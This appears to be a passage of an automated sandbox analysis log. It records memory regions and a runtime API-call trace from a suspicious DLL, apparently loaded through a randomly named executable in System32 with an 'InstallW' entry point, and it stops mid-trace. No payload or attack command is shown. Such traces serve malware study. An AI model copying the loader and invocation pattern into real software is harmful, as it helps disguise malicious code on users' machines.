"\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 1551 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 1552 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1553 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1554 start_va = 0x5f0000 end_va = 0x79ffff entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 1555 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1556 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1557 start_va = 0x2b0000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Thread: id = 72 os_tid = 0xbf4 [0033.385] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2af8d4 | out: lpSystemTimeAsFileTime=0x2af8d4*(dwLowDateTime=0xe19686f0, dwHighDateTime=0x1d3dfba)) [0033.385] GetCurrentProcessId () returned 0xbf0 [0033.385] GetCurrentThreadId () returned 0xbf4 [0033.385] GetTickCount () returned 0x177be [0033.385] QueryPerformanceCounter (in: lpPerformanceCount=0x2af8cc | out: lpPerformanceCount=0x2af8cc*=367143609) returned 1 [0033.385] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.385] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0033.385] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0033.385] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0033.385] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0033.386] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.386] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.386] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.386] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.386] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.386] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.386] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.386] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.386] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.386] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.386] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.386] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.386] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.386] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.387] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.387] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0033.387] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.387] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0033.387] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.387] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.387] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0033.388] GetCurrentThreadId () returned 0xbf4 [0033.388] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=InstallW /fn_args=\"Install\"" [0033.388] GetEnvironmentStringsW () returned 0x3b7858* [0033.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0033.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x7909f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0033.388] FreeEnvironmentStringsW (penv=0x3b7858) returned 1 [0033.388] GetStartupInfoA (in: lpStartupInfo=0x2af824 | out: lpStartupInfo=0x2af824*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0033.388] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0033.388] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0033.388] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0033.388] SetHandleCount (uNumber=0x20) returned 0x20 [0033.388] GetLastError () returned 0x0 [0033.388] SetLastError (dwErrCode=0x0) [0033.388] GetLastError () returned 0x0 [0033.388] SetLastError (dwErrCode=0x0) [0033.388] GetLastError () returned 0x0 [0033.388] SetLastError (dwErrCode=0x0) [0033.388] GetACP () returned 0x4e4 [0033.388] GetLastError () returned 0x0 [0033.388] SetLastError (dwErrCode=0x0) [0033.388] IsValidCodePage (CodePage=0x4e4) returned 1 [0033.388] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x2af804 | out: lpCPInfo=0x2af804) returned 1 [0033.388] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x2af2d0 | out: lpCPInfo=0x2af2d0) returned 1 [0033.388] GetLastError () returned 0x0 [0033.389] SetLastError (dwErrCode=0x0) [0033.389] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x2af260 | out: lpCharType=0x2af260) returned 1 [0033.389] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2af6e4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0033.389] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2af6e4, cbMultiByte=256, lpWideCharStr=0x2af048, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0033.389] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x2af2e4 | out: lpCharType=0x2af2e4) returned 1 [0033.389] GetLastError () returned 0x0 [0033.389] SetLastError (dwErrCode=0x0) [0033.389] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0033.389] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2af6e4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0033.389] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2af6e4, cbMultiByte=256, lpWideCharStr=0x2af018, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ궲矲狰Ā") returned 256 [0033.389] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ궲矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0033.389] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ궲矲狰Ā", cchSrc=256, lpDestStr=0x2aee08, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0033.389] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x2af5e4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ!¤\x99ô\x1cø*", lpUsedDefaultChar=0x0) returned 256 [0033.389] GetLastError () returned 0x0 [0033.389] SetLastError (dwErrCode=0x0) [0033.389] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2af6e4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0033.389] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2af6e4, cbMultiByte=256, lpWideCharStr=0x2af038, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ궲矲狰Ā") returned 256 [0033.389] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ궲矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0033.389] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ궲矲狰Ā", cchSrc=256, lpDestStr=0x2aee28, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0033.389] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x2af4e4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ!¤\x99ô\x1cø*", lpUsedDefaultChar=0x0) returned 256 [0033.389] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.389] GetLastError () returned 0x0 [0033.389] SetLastError (dwErrCode=0x0) [0033.389] GetLastError () returned 0x0 [0033.389] SetLastError (dwErrCode=0x0) [0033.389] GetLastError () returned 0x0 [0033.389] SetLastError (dwErrCode=0x0) [0033.389] GetLastError () returned 0x0 [0033.389] SetLastError (dwErrCode=0x0) [0033.389] GetLastError () returned 0x0 [0033.389] SetLastError (dwErrCode=0x0) [0033.389] GetLastError () returned 0x0 [0033.389] SetLastError (dwErrCode=0x0) [0033.390] GetLastError () returned 0x0 [0033.390] SetLastError (dwErrCode=0x0) [0033.390] GetLastError () returned 0x0 [0033.390] SetLastError (dwErrCode=0x0) [0033.390] GetLastError () returned 0x0 [0033.390] SetLastError (dwErrCode=0x0) [0033.390] GetLastError () returned 0x0 [0033.390] SetLastError (dwErrCode=0x0) [0033.390] GetLastError () returned 0x0 [0033.390] SetLastError (dwErrCode=0x0) [0033.390] GetLastError () returned 0x0 [0033.390] SetLastError (dwErrCode=0x0) [0033.390] GetLastError () returned 0x0 [0033.390] SetLastError (dwErrCode=0x0) [0033.390] GetLastError () returned 0x0 [0033.390] SetLastError (dwErrCode=0x0) [0033.390] GetLastError () returned 0x0 [0033.390] SetLastError (dwErrCode=0x0) [0033.390] GetLastError () returned 0x0 [0033.390] SetLastError (dwErrCode=0x0) [0033.390] GetLastError () returned 0x0 [0033.390] SetLastError (dwErrCode=0x0) [0033.390] GetLastError () returned 0x0 [0033.390] SetLastError (dwErrCode=0x0) [0033.390] GetLastError () returned 0x0 [0033.390] SetLastError (dwErrCode=0x0) [0033.390] GetLastError () returned 0x0 [0033.390] SetLastError (dwErrCode=0x0) [0033.390] GetLastError () returned 0x0 [0033.390] SetLastError (dwErrCode=0x0) [0033.390] GetLastError () returned 0x0 [0033.390] SetLastError (dwErrCode=0x0) [0033.390] GetLastError () returned 0x0 [0033.391] SetLastError (dwErrCode=0x0) [0033.391] GetLastError () returned 0x0 [0033.391] SetLastError (dwErrCode=0x0) [0033.391] GetLastError () returned 0x0 [0033.391] SetLastError (dwErrCode=0x0) [0033.391] GetLastError () returned 0x0 [0033.391] SetLastError (dwErrCode=0x0) [0033.391] GetLastError () returned 0x0 [0033.391] SetLastError (dwErrCode=0x0) [0033.391] GetLastError () returned 0x0 [0033.391] SetLastError (dwErrCode=0x0) [0033.391] GetLastError () returned 0x0 [0033.391] SetLastError (dwErrCode=0x0) [0033.391] GetLastError () returned 0x0 [0033.391] SetLastError (dwErrCode=0x0) [0033.391] GetLastError () returned 0x0 [0033.391] SetLastError (dwErrCode=0x0) [0033.391] GetLastError () returned 0x0 [0033.391] SetLastError (dwErrCode=0x0) [0033.391] GetLastError () returned 0x0 [0033.391] SetLastError (dwErrCode=0x0) [0033.391] GetLastError () returned 0x0 [0033.391] SetLastError (dwErrCode=0x0) [0033.391] GetLastError () returned 0x0 [0033.391] SetLastError (dwErrCode=0x0) [0033.391] GetLastError () returned 0x0 [0033.391] SetLastError (dwErrCode=0x0) [0033.391] GetLastError () returned 0x0 [0033.391] SetLastError (dwErrCode=0x0) [0033.391] GetLastError () returned 0x0 [0033.391] SetLastError (dwErrCode=0x0) [0033.391] GetLastError () returned 0x0 [0033.391] SetLastError (dwErrCode=0x0) [0033.392] GetLastError () returned 0x0 [0033.392] SetLastError (dwErrCode=0x0) [0033.392] GetLastError () returned 0x0 [0033.392] SetLastError (dwErrCode=0x0) [0033.392] GetLastError () returned 0x0 [0033.392] SetLastError (dwErrCode=0x0) [0033.392] GetLastError () returned 0x0 [0033.392] SetLastError (dwErrCode=0x0) [0033.392] GetLastError () returned 0x0 [0033.392] SetLastError (dwErrCode=0x0) [0033.392] GetLastError () returned 0x0 [0033.392] SetLastError (dwErrCode=0x0) [0033.392] GetLastError () returned 0x0 [0033.392] SetLastError (dwErrCode=0x0) [0033.392] GetLastError () returned 0x0 [0033.392] SetLastError (dwErrCode=0x0) [0033.392] GetLastError () returned 0x0 [0033.392] SetLastError (dwErrCode=0x0) [0033.392] GetLastError () returned 0x0 [0033.392] SetLastError (dwErrCode=0x0) [0033.392] GetLastError () returned 0x0 [0033.392] SetLastError (dwErrCode=0x0) [0033.392] GetLastError () returned 0x0 [0033.392] SetLastError (dwErrCode=0x0) [0033.392] GetLastError () returned 0x0 [0033.392] SetLastError (dwErrCode=0x0) [0033.392] GetLastError () returned 0x0 [0033.392] SetLastError (dwErrCode=0x0) [0033.392] GetLastError () returned 0x0 [0033.392] SetLastError (dwErrCode=0x0) [0033.392] GetLastError () returned 0x0 [0033.392] SetLastError (dwErrCode=0x0) [0033.392] GetLastError () returned 0x0 [0033.392] SetLastError (dwErrCode=0x0) [0033.392] GetLastError () returned 0x0 [0033.393] SetLastError (dwErrCode=0x0) [0033.393] GetLastError () returned 0x0 [0033.393] SetLastError (dwErrCode=0x0) [0033.393] GetLastError () returned 0x0 [0033.393] SetLastError (dwErrCode=0x0) [0033.393] GetLastError () returned 0x0 [0033.393] SetLastError (dwErrCode=0x0) [0033.393] GetLastError () returned 0x0 [0033.393] 